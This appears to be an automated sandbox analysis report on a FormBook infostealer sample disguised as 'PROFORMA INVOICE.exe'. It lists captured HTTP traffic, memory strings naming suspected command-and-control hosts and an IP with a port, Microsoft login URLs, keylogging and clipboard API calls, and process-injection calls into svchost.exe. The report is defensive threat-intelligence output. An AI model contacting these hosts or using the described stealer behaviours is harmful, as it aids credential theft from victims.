Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 15 Nov 2024 03:23:34 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingData Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 224<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 15 Nov 2024 03:23:55 GMTServer: ApacheX-ServerIndex: llim604Upgrade: h2,h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 61 39 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 49 53 4f 2d 38 38 35 39 2d 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 77 77 77 2e 63 65 73 61 63 68 2e 6e 65 74 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 70 69 65 6e 73 61 73 6f 6c 75 74 69 6f 6e 73 2e 63 6f 6d 2f 63 73 73 2f 70 61 72 6b 69 6e 67 32 2e 63 73 73 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 45 78 6f 27 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 69 64 3d 22 74 68 65 57 69 64 74 68 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 28 73 63 72 65 65 6e 2e 77 69 64 74 68 20 3c 3d 20 34 32 30 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 6d 76 70 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 74 68 65 57 69 64 74 68 27 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 76 70 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 63 6f 6e 74 65 6e 74 27 2c 27 77 69 64 74 68 3d 34 30 30 27 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 21 2d 2d 20 63 6c 69 65 6e 74 20 2d 2d 3e 0d 0a 3c 68 65 61 64 65 72 3e 0d 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 65 6e 74 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 3b 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 69 74 6c 65 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 70 69 65 6e 73 61 73 6f 6c 75 74 69 6f 6e 73 2e 63 6f 6d 2
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 15 Nov 2024 03:23:58 GMTServer: ApacheX-ServerIndex: llim605Upgrade: h2,h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 61 39 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 49 53 4f 2d 38 38 35 39 2d 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 77 77 77 2e 63 65 73 61 63 68 2e 6e 65 74 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 70 69 65 6e 73 61 73 6f 6c 75 74 69 6f 6e 73 2e 63 6f 6d 2f 63 73 73 2f 70 61 72 6b 69 6e 67 32 2e 63 73 73 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 45 78 6f 27 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 69 64 3d 22 74 68 65 57 69 64 74 68 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 28 73 63 72 65 65 6e 2e 77 69 64 74 68 20 3c 3d 20 34 32 30 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 6d 76 70 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 74 68 65 57 69 64 74 68 27 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 76 70 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 63 6f 6e 74 65 6e 74 27 2c 27 77 69 64 74 68 3d 34 30 30 27 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 21 2d 2d 20 63 6c 69 65 6e 74 20 2d 2d 3e 0d 0a 3c 68 65 61 64 65 72 3e 0d 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 65 6e 74 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 3b 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 69 74 6c 65 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 70 69 65 6e 73 61 73 6f 6c 75 74 69 6f 6e 73 2e 63 6f 6d 2
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 15 Nov 2024 03:24:01 GMTServer: ApacheX-ServerIndex: llim603Upgrade: h2,h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 61 39 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 49 53 4f 2d 38 38 35 39 2d 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 77 77 77 2e 63 65 73 61 63 68 2e 6e 65 74 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 70 69 65 6e 73 61 73 6f 6c 75 74 69 6f 6e 73 2e 63 6f 6d 2f 63 73 73 2f 70 61 72 6b 69 6e 67 32 2e 63 73 73 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 45 78 6f 27 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 69 64 3d 22 74 68 65 57 69 64 74 68 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 28 73 63 72 65 65 6e 2e 77 69 64 74 68 20 3c 3d 20 34 32 30 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 6d 76 70 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 74 68 65 57 69 64 74 68 27 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 76 70 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 63 6f 6e 74 65 6e 74 27 2c 27 77 69 64 74 68 3d 34 30 30 27 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 21 2d 2d 20 63 6c 69 65 6e 74 20 2d 2d 3e 0d 0a 3c 68 65 61 64 65 72 3e 0d 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 65 6e 74 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 3b 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 69 74 6c 65 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 70 69 65 6e 73 61 73 6f 6c 75 74 69 6f 6e 73 2e 63 6f 6d 2

Source: qWxlULNrWdo.exe, 00000008.00000002.3559031904.0000000004F2C000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.cesach.net
Source: qWxlULNrWdo.exe, 00000008.00000002.3559031904.0000000004F2C000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.cesach.net/qutj/
Source: qWxlULNrWdo.exe, 00000008.00000002.3556864770.00000000037C0000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.klohk.tech/3m3e/?R4qXin=AG8wkc12D4O4qfEwAs2juVKQc9rSxhRu
Source: ktmutil.exe, 00000005.00000002.3557624704.0000000003CA4000.00000004.10000000.00040000.00000000.sdmp, qWxlULNrWdo.exe, 00000008.00000002.3556864770.0000000002E54000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2265030453.0000000006554000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://34.92.79.175:19817/register
Source: ktmutil.exe, 00000005.00000002.3560003786.0000000007A5E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: ktmutil.exe, 00000005.00000002.3560003786.0000000007A5E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: ktmutil.exe, 00000005.00000002.3560003786.0000000007A5E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: ktmutil.exe, 00000005.00000002.3560003786.0000000007A5E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: ktmutil.exe, 00000005.00000002.3560003786.0000000007A5E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: ktmutil.exe, 00000005.00000002.3560003786.0000000007A5E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: ktmutil.exe, 00000005.00000002.3560003786.0000000007A5E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: ktmutil.exe, 00000005.00000002.3557624704.0000000003CA4000.00000004.10000000.00040000.00000000.sdmp, qWxlULNrWdo.exe, 00000008.00000002.3556864770.0000000002E54000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2265030453.0000000006554000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://hm.baidu.com/hm.js?874f82fc659e5acd8a958bbf89041d1f
Source: ktmutil.exe, 00000005.00000002.3555301986.0000000002C4D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.c
Source: ktmutil.exe, 00000005.00000002.3555301986.0000000002C4D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: ktmutil.exe, 00000005.00000002.3555301986.0000000002C4D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: ktmutil.exe, 00000005.00000002.3555301986.0000000002C4D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: ktmutil.exe, 00000005.00000002.3555301986.0000000002C4D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: ktmutil.exe, 00000005.00000002.3555301986.0000000002C4D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: ktmutil.exe, 00000005.00000002.3555301986.0000000002C4D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: ktmutil.exe, 00000005.00000003.2149857449.0000000007A3D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: ktmutil.exe, 00000005.00000002.3560003786.0000000007A5E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/

Source: C:\Users\user\Desktop\PROFORMA INVOICE.exe

Code function: 0_2_00FB6B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

0_2_00FB6B0C

Source: C:\Users\user\Desktop\PROFORMA INVOICE.exe

Code function: 0_2_00FB6D07 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_00FB6D07

Source: C:\Users\user\Desktop\PROFORMA INVOICE.exe

0_2_00FB6B0C

Source: C:\Users\user\Desktop\PROFORMA INVOICE.exe

Code function: 0_2_00FA2B37 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,

0_2_00FA2B37

Source: C:\Users\user\Desktop\PROFORMA INVOICE.exe

Code function: 0_2_00FCF7FF DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

0_2_00FCF7FF

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.1966199008.0000000006E90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3555099409.0000000002A10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3556751373.0000000002F20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1958657577.00000000051E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1958001849.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.3559031904.0000000004EA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3556631891.0000000002EC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3556728136.00000000043A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

System Summary

Binary is likely a compiled AutoIt script file

Source: C:\Users\user\Desktop\PROFORMA INVOICE.exe	Code function: This is a third-party compiled AutoIt script.	0_2_00F63D19
Source: PROFORMA INVOICE.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: PROFORMA INVOICE.exe, 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_5c99e4e2-e
Source: PROFORMA INVOICE.exe, 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_60530261-4
Source: PROFORMA INVOICE.exe	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_77aa23c5-e
Source: PROFORMA INVOICE.exe	String found in binary or memory: CSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_9705e043-2

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: PROFORMA INVOICE.exe

Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0042C883 NtClose,	1_2_0042C883
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A72B60 NtClose,LdrInitializeThunk,	1_2_03A72B60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A72DF0 NtQuerySystemInformation,LdrInitializeThunk,	1_2_03A72DF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A72C70 NtFreeVirtualMemory,LdrInitializeThunk,	1_2_03A72C70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A735C0 NtCreateMutant,LdrInitializeThunk,	1_2_03A735C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A74340 NtSetContextThread,	1_2_03A74340
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A74650 NtSuspendThread,	1_2_03A74650
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A72BA0 NtEnumerateValueKey,	1_2_03A72BA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A72B80 NtQueryInformationFile,	1_2_03A72B80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A72BE0 NtQueryValueKey,	1_2_03A72BE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A72BF0 NtAllocateVirtualMemory,	1_2_03A72BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A72AB0 NtWaitForSingleObject,	1_2_03A72AB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A72AF0 NtWriteFile,	1_2_03A72AF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A72AD0 NtReadFile,	1_2_03A72AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A72FA0 NtQuerySection,	1_2_03A72FA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A72FB0 NtResumeThread,	1_2_03A72FB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A72F90 NtProtectVirtualMemory,	1_2_03A72F90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A72FE0 NtCreateFile,	1_2_03A72FE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A72F30 NtCreateSection,	1_2_03A72F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A72F60 NtCreateProcessEx,	1_2_03A72F60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A72EA0 NtAdjustPrivilegesToken,	1_2_03A72EA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A72E80 NtReadVirtualMemory,	1_2_03A72E80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A72EE0 NtQueueApcThread,	1_2_03A72EE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A72E30 NtWriteVirtualMemory,	1_2_03A72E30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A72DB0 NtEnumerateKey,	1_2_03A72DB0
